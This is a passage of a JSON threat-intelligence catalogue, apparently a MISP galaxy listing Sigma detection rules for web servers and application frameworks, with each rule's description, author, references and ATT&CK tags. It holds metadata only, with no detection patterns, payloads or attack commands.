"attack.defense-evasion", "attack.command-and-control", "attack.t1071.001", "attack.t1102.002" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b494b165-6634-483d-8c47-2026a6c52372", "value": "Telegram API Access" }, { "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-31", "falsepositive": [ "Serious issues with a configuration or plugin" ], "filename": "web_nginx_core_dump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/nginx/web_nginx_core_dump.yml" ], "tags": [ "attack.impact", "attack.t1499.004" ] }, "related": [ { "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", "value": "Nginx Core Dump" }, { "description": "Detects an issue in apache logs that reports threading related errors", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-01-22", "falsepositive": [ "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" ], "filename": "web_apache_threading_error.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ 
"https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_threading_error.yml" ], "tags": [ "attack.initial-access", "attack.lateral-movement", "attack.t1190", "attack.t1210" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", "value": "Apache Threading Error" }, { "description": "Detects a segmentation fault error message caused by a crashing apache worker process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-28", "falsepositive": [ "Unknown" ], "filename": "web_apache_segfault.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ "http://www.securityfocus.com/infocus/1633", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_segfault.yml" ], "tags": [ "attack.impact", "attack.t1499.004" ] }, "related": [ { "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", "value": "Apache Segmentation Fault" }, { "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", "meta": { "author": "James Ahearn", "creation_date": "2019-06-08", "falsepositive": [ "Unknown" ], "filename": "web_source_code_enumeration.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ 
"https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_source_code_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", "value": "Source Code Enumeration Detection by Keyword" }, { "description": "Detects possible Java payloads in web access logs", "meta": { "author": "frack113, Harjot Singh, \"@cyb3rjy0t\" (update)", "creation_date": "2022-06-04", "falsepositive": [ "Legitimate apps" ], "filename": "web_java_payload_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035", "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_java_payload_in_access_logs.yml" ], "tags": [ "cve.2022-26134", "cve.2021-26084", "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", "value": "Java Payload Strings" }, { "description": "Certain strings in the uri_query 
field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", "meta": { "author": "Cian Heasley", "creation_date": "2020-08-04", "falsepositive": [ "Web applications that use the same URL parameters as ReGeorg" ], "filename": "web_webshell_regeorg.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/sensepost/reGeorg", "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_webshell_regeorg.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", "value": "Webshell ReGeorg Detection Via Web Logs" }, { "description": "Detects exploitation attempt using the JNDI-Exploit-Kit", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-12", "falsepositive": [ "Legitimate apps the use these paths" ], "filename": "web_jndi_exploit.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/pimps/JNDI-Exploit-Kit", "https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_jndi_exploit.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", "value": "JNDIExploit Pattern" }, { "description": "Detects XSS attempts injected via GET requests in access logs", 
"meta": { "author": "Saw Win Naung, Nasreddine Bencherchali", "creation_date": "2021-08-15", "falsepositive": [ "JavaScripts,CSS Files and PNG files", "User searches in search boxes of the respective website", "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" ], "filename": "web_xss_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/payloadbox/xss-payload-list", "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_xss_in_access_logs.yml" ], "tags": [ "attack.initial-access", "attack.t1189" ] }, "related": [ { "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", "value": "Cross Site Scripting Strings" }, { "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "creation_date": "2022-07-19", "falsepositive": [ "Unknown" ], "filename": "web_susp_useragents.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_useragents.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { 
"dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", "value": "Suspicious User-Agents Related To Recon Tools" }, { "description": "Detects SSTI attempts sent via GET requests in access logs", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-14", "falsepositive": [ "User searches in search boxes of the respective website", "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" ], "filename": "web_ssti_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/payloadbox/ssti-payloads", "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_ssti_in_access_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1221" ] }, "related": [ { "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", "value": "Server Side Template Injection Strings" }, { "description": "Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Thurein Oo", "creation_date": "2023-11-08", "falsepositive": [ "Legitimate usage of the BIG IP REST API to execute command for administration purposes" ], "filename": "web_f5_tm_utility_bash_api_request.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ 
"https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash", "https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029", "https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml" ], "tags": [ "attack.execution", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85254a62-22be-4239-b79c-2ec17e566c37", "value": "F5 BIG-IP iControl Rest API Command Execution - Webserver" }, { "description": "Detects common commands used in Windows webshells", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-02-19", "falsepositive": [ "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", "User searches in search boxes of the respective website" ], "filename": "web_win_webshells_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://bad-jubies.github.io/RCE-NOW-WHAT/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", "value": "Windows Webshell Strings" }, { "description": "Detects potential SQL injection attempts via GET requests in access logs.", "meta": { "author": "Saw Win Naung, Nasreddine 
Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank)", "creation_date": "2020-02-22", "falsepositive": [ "Java scripts and CSS Files", "User searches in search boxes of the respective website", "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" ], "filename": "web_sql_injection_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection", "https://github.com/payloadbox/sql-injection-payload-list", "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", "https://brightsec.com/blog/sql-injection-payloads/", "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sql_injection_in_access_logs.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", "value": "SQL Injection Strings In URI" }, { "description": "Detects path traversal exploitation attempts", "meta": { "author": "Subhash Popuri (@pbssubhash), Florian Roth (Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-09-25", "falsepositive": [ "Expected to be continuously seen on systems exposed to the Internet", "Internal vulnerability scanners" ], "filename": "web_path_traversal_exploitation_attempt.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://book.hacktricks.xyz/pentesting-web/file-inclusion", "https://github.com/projectdiscovery/nuclei-templates", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", "value": "Path Traversal Exploitation Attempts" }, { "description": "Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-06", "falsepositive": [ "Legitimate application and websites that use windows paths in their URL" ], "filename": "web_susp_windows_path_uri.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_windows_path_uri.yml" ], "tags": [ "attack.persistence", "attack.exfiltration", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", "value": "Suspicious Windows Strings In URI" }, { "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", "meta": { "author": "frack113", "creation_date": "2021-10-06", "falsepositive": [ "Unknown" ], "filename": "web_iis_tilt_shortname_scan.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/lijiejie/IIS_shortname_Scanner", "https://www.exploit-db.com/exploits/19525", 
"https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", "value": "Successful IIS Shortname Fuzzing Scan" }, { "description": "Generic rule for SQL exceptions in Python according to PEP 249", "meta": { "author": "Thomas Patzke", "creation_date": "2017-08-12", "falsepositive": [ "Application bugs" ], "filename": "app_python_sql_exceptions.yml", "level": "medium", "logsource.category": "application", "logsource.product": "python", "refs": [ "https://www.python.org/dev/peps/pep-0249/#exceptions", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", "value": "Python SQL Exceptions" }, { "description": "Detects potential JNDI Injection exploitation. 
Often coupled with Log4Shell exploitation.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "java_jndi_injection_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_jndi_injection_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb0e9cec-d4da-46f5-997f-22efc59f3dca", "value": "Potential JNDI Injection Exploitation In JVM Based Application" }, { "description": "Detects process execution related exceptions in JVM based apps, often relates to RCE", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "java_rce_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_rce_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d65f37da-a26a-48f8-8159-3dde96680ad2", "value": "Process Execution Error In JVM Based Application" }, { "description": "Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized 
safely.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "If the application expects to work with XML there may be parsing issues that don't necessarily mean XXE." ], "filename": "java_xxe_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing", "https://rules.sonarsource.com/java/RSPEC-2755", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_xxe_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4e06896-e27c-4583-95ac-91ce2279345d", "value": "Potential XXE Exploitation Attempt In JVM Based Application" }, { "description": "Detects potential local file read vulnerability in JVM based apps.\nIf the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.\n", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "java_local_file_read.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_local_file_read.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e032f5bc-4563-4096-ae3b-064bab588685", "value": "Potential Local File Read 
Vulnerability In JVM Based Application" }, { "description": "Detects potential OGNL Injection exploitation, which may lead to RCE.\nOGNL is an expression language that is supported in many JVM based systems.\nOGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)\n", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "java_ognl_injection_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_ognl_injection_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "cve.2017-5638", "cve.2022-26134" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d0af518-828e-4a04-a751-a7d03f3046ad", "value": "Potential OGNL Injection Exploitation In JVM Based Application" }, { "description": "Detects potential SpEL Injection exploitation, which may lead to RCE.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "spring_spel_injection.yml", "level": "high", "logsource.category": "application", "logsource.product": "spring", "refs": [ "https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_spel_injection.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9edd087-89d8-48c9-b0b4-5b9bb10896b8", "value": "Potential SpEL Injection In Spring Framework" }, { "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", "meta": { "author": "Thomas Patzke", "creation_date": "2017-08-06", "falsepositive": [ "Application bugs" ], "filename": "spring_application_exceptions.yml", "level": "medium", "logsource.category": "application", "logsource.product": "spring", "refs": [ "https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_application_exceptions.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", "value": "Spring Framework Exceptions" }, { "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", "meta": { "author": "Thomas Patzke", "creation_date": "2017-08-06", "falsepositive": [ "Application bugs" ], "filename": "appframework_ruby_on_rails_exceptions.yml", "level": "medium", "logsource.category": "application", "logsource.product": "ruby_on_rails", "refs": [ "http://edgeguides.rubyonrails.org/security.html", "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", "http://guides.rubyonrails.org/action_controller_overview.html", "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { 
"dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", "value": "Ruby on Rails Framework Exceptions" }, { "description": "Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs", "Missing .vm files" ], "filename": "velocity_ssti_injection.yml", "level": "high", "logsource.category": "application", "logsource.product": "velocity", "refs": [ "https://antgarsil.github.io/posts/velocity/", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/velocity/velocity_ssti_injection.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16c86189-b556-4ee8-b4c7-7e350a195a4f", "value": "Potential Server Side Template Injection In Velocity" }, { "description": "Detects SQL error messages that indicate probing for an injection attack", "meta": { "author": "Bjoern Kimminich", "creation_date": "2017-11-27", "falsepositive": [ "A syntax error in MySQL also occurs in non-dynamic (safe) queries if there is an empty in() clause, that may often be the case." 
], "filename": "app_sqlinjection_errors.yml", "level": "high", "logsource.category": "application", "logsource.product": "sql", "refs": [ "http://www.sqlinjection.net/errors", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", "value": "Suspicious SQL Error Messages" }, { "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", "meta": { "author": "Thomas Patzke", "creation_date": "2017-08-05", "falsepositive": [ "Application bugs" ], "filename": "appframework_django_exceptions.yml", "level": "medium", "logsource.category": "application", "logsource.product": "django", "refs": [ "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", "https://docs.djangoproject.com/en/1.11/ref/exceptions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", "value": "Django Framework Exceptions" }, { "description": "Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Puppeteer invocation exceptions often contain child_process related errors, that doesn't necessarily mean that the app is vulnerable." 
], "filename": "nodejs_rce_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "nodejs", "refs": [ "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/nodejs/nodejs_rce_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97661d9d-2beb-4630-b423-68985291a8af", "value": "Potential RCE Exploitation Attempt In NodeJS" }, { "description": "Detects instances where an SMB service on an OpenCanary node has had a file open request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_smb_file_open.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_smb_file_open.yml" ], "tags": [ "attack.lateral-movement", "attack.collection", "attack.t1021", "attack.t1005" ] }, "related": [ { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "22777c9e-873a-4b49-855f-6072ab861a52", "value": "OpenCanary - SMB File Open Request" }, { "description": "Detects instances where a VNC service on an OpenCanary node has had a connection 
